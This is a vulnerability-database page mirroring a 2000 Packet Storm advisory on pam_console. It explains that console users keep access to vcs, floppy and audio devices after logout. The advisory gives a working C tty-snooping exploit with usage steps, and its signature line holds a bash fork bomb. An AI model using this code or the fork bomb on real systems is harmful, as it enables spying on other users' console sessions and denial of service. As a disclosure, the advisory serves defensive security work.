Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pam_console.bug

🗓️ 17 May 2000 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Potential security risk due to pam_console allowing snooping on tty devices after logout.

Code
`When accepting luser console login, pam_console called by /bin/login tries  
to be user-friendly, doing several chowns on devices like login tty and  
corresponding vcs[a] device, as well as other interesting devices: fd*,  
audio devices (dsp*, mixer*, audio*, midi*, sequencer), cdrom,  
streamer/zip drive devices, frame buffer devices, kbd*, js*, video*,  
radio*, winradio*, vtx*, vbi* and so on. Probably it's designed to make  
console logins more comfortable, but has DEADLY effects on servers with  
console luser-login ability (and that's quite common).  
  
On logout, these devices are chown'ed back to root, but unlike  
/dev/tty[0-9], these devices have no hangup mechanism, so user will have  
full control over them after logout by opening them and then keeping the  
file descriptor. The easiest attack is read-write snooping of consoles.  
Log in on console once, open /dev/vcsX (where X corresponds to tty  
number), then logout. By continous lseek/read loop, your program will be  
able to snoop futher logins on this console - forever. Also, it's possible  
to write() on snooped console... Ugh. Other possibilities include reading  
any inserted cd, reading/writing any inserted floppy, messing with  
video/audio devices and so on, all in the same way.  
  
Minimal tty snoop exploit:  
  
-- vcssnoop.c --  
#include <sys/fcntl.h>  
  
main(int argc,char*argv[]) {  
char buf[80*24];  
int f=open(argv[1],O_RDWR);  
while (1) {  
lseek(f,0,0);  
read(f,buf,sizeof(buf));  
write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi  
write(1,buf,sizeof(buf));  
usleep(10000);  
}  
}  
-- EOF --  
  
Log onto console, let's say it's tty3. Then, compile and launch this  
program via screen, giving path to vcs device corresponding to your login  
tty (in this case, /dev/tty3). Then, detach this screen and logout. Wait  
some time, log in remotely to your account and resume screen session. You  
should see real-time tty3 dump.  
  
_______________________________________________________  
Michal Zalewski [[email protected]] [tp.internet/security]  
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:  
=-----=> God is real, unless declared integer. <=-----=  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4
console login security device ownership terminal snooping user privileges logout exploit pam_console vulnerability tty device access
23